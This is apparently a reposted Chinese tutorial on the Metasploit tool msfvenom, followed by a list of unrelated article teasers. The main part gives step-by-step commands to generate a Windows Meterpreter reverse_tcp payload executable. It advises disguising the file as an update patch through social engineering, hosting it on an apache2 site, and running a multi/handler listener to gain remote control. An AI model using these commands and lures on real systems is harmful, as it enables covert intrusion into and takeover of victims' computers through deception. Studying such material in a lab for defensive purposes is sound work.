MSFVENOM的使用

#江南的江

#每日鸡汤:泪水和汗水的化学成分相似,但前者只能为你换来同情,后则却可以为你赢得成功。

#初心和目标:争取拿到7ools 的账号。

MSFVENOM

Msfvenom是一个自定义的载荷系统,他是基于msf框架下的附属软件,例如他可以将载荷制成exe文件,然后经过对目标的输出或者社会工程,来对目标进行控制。

实验环境:

攻击机kali

目标windows7(目标不做特殊要求,主要没有安装杀毒和启动病毒防护就行)

先用kali,msfvenom -p windows/meterpreter/revese_tcp

Lhost=XXX.XXX.XXX.XXX     lport=5555  -f exe > (指定一个文件名且后缀为exe的)test.exe

那么如何让目标获得这个文件呢?这要靠你的社会工程学

例如把名字改的好点像是什么更新补丁什么的。

接着我们用apache2来创建一个网站,然后用这个网站达到让目标获得文件的效果

在让目标进行之前先打开msfconsole进行监听

用的是use exploit/multi/handler

Set lhost XXX.XXX.XXX.XXX

Set lport XXX.XXX.XXX.XXX

上面的这些值是你预先在exe文件中设置好的。

然后再设置相应的攻击载荷:

Set payload windows/meterpreter/reverse_tcp

Run

出现这个就表明正在监听,然后让目标打开并使用test.exe文件

成功打入

下面就可以自由的利用吗meterpreter工具箱了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/298420.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

C#中如何稳定精确地每隔5ms执行某个函数?

C#中如何稳定精确地每隔5ms执行某个函数? 在开始前我有一些资料,是我根据自己从业十年经验,熬夜搞了几个通宵,精心整理了一份「C#的资料从专业入门到高级教程工具包」,点个关注,全部无偿共享给大家&#xf…

SATA和M.2接口的异同点

SATA和M.2接口是连接存储设备的两种常见接口,它们在物理尺寸、传输速度、线缆和接头以及适用设备类型等方面有着显著的异同点。 物理尺寸 SATA接口通常用于2.5英寸硬盘、3.5英寸硬盘等传统机械硬盘以及SSD,而M.2接口则是一种较为新型的接口标准&#xff…

数据结构:KMP算法

1.何为KMP算法 KMP算法是由Knuth、Morris和Pratt三位学者发明的,所以取了三位学者名字的首字母,叫作KMP算法。 2.KMP的用处 KMP主要用于字符串匹配的问题,主要思想是当出现字符串不匹配时,我们可以知道一部分之前已经匹配过的的文…

【并发编程篇】读锁readLock()和写锁writeLock()

文章目录 🛸情景引入⭐解决问题 readLock()和writeLock()都是ReadWriteLock接口中定义的方法,用于获取读锁和写锁。 readLock()方法返回一个读锁,允许多个线程同时获取该锁,以进行并发读取操作。如果当前已有一个写锁或其他线程正…

【强化学习】PPO:近端策略优化算法

近端策略优化算法 《Proximal Policy Optimization Algorithms》 论文地址:https://arxiv.org/pdf/1707.06347.pdf 一、 置信域方法(Trust Region Methods) ​ 设 π θ o l d \pi_{\theta_{old}} πθold​​是先前参数为 θ o l d \theta_{old} θold​的策略网…

运筹视角下,体系化学习机器学习算法原理的实践和总结

文章目录 引言目标设计目标实践文章汇总经验总结一则预告 引言 上两周总结了我在体系化学习运筹学基础知识方面的个人经验,看过那篇文章的人可能知道,今年我还花了很多时间学习机器学习中各种模型的算法原理。 在工业应用中,机器学习和运筹…

毫米波RIS研究测试方案:一站式助力工程师探索高频通信未来

方案介绍 在当前科技高速发展的时代,毫米波通信技术因其高数据传输速率和大容量的潜力而备受瞩目。其中,可重构智能表面(RIS)作为一项创新技术,正在为毫米波通信系统的设计和优化带来新的可能性。为了应对这一领域的研…

静态HTTP的优势:速度、安全性和可扩展性,一个都不能少!

大家好,今天我们来聊聊静态HTTP的优势。有人可能会说:“静态HTTP,不就是那些不会动的网页吗?”错!静态HTTP可不仅仅是静止不动的,它可是让网站速度飞快、安全稳定、扩展性强的神器!不信&#xf…

【办公技巧】ppt如何加密只能看不能修改?

大家是否想要给PPT文件设置加密,让ppt文件变为只能查看不能修改的状态?今天给大家分享给PPT文件设置带有密码的只读模式(修改权限)。 方法如下: PPT文件之后,将PPT文件进行另存为操作,但是在选…

“C语言“——scanf()、getchar() 、putchar()、之间的关系

scanf函数说明 scanf函数是对来自于标准输入流的输入数据作格式转换,并将转换结果保存至format后面的实参所指向的对象。 而const char*format 指向的字符串为格式控制字符串,它指定了可输入的字符串以及赋值时转换方法。 简单来说给一个打印格式(输入…

自己动手做 chatgpt:seq2seq翻译模型中GRU模块的原理和数据预处理

chatgpt 是典型的 NLP 类型应用。也就是它主要于语言的处理和输出。因此它的模型设计必然借鉴了深度学习早期在语言翻译方面的算法设计。因此理解 chatgpt 我们就需要理解深度学习算法是如何处理自然语言翻译这个问题,就像学习微积分时,我们需要提前掌握…

(Matlab)基于CNN-LSTM的多维回归预测(卷积神经网络-长短期记忆网络)

目录 一、程序及算法内容介绍: 基本内容: 亮点与优势: 二、代码实际运行效果: 三、部分代码展示: 四、本文完整代码数据分享: 一、程序及算法内容介绍: 基本内容: 本代码基于…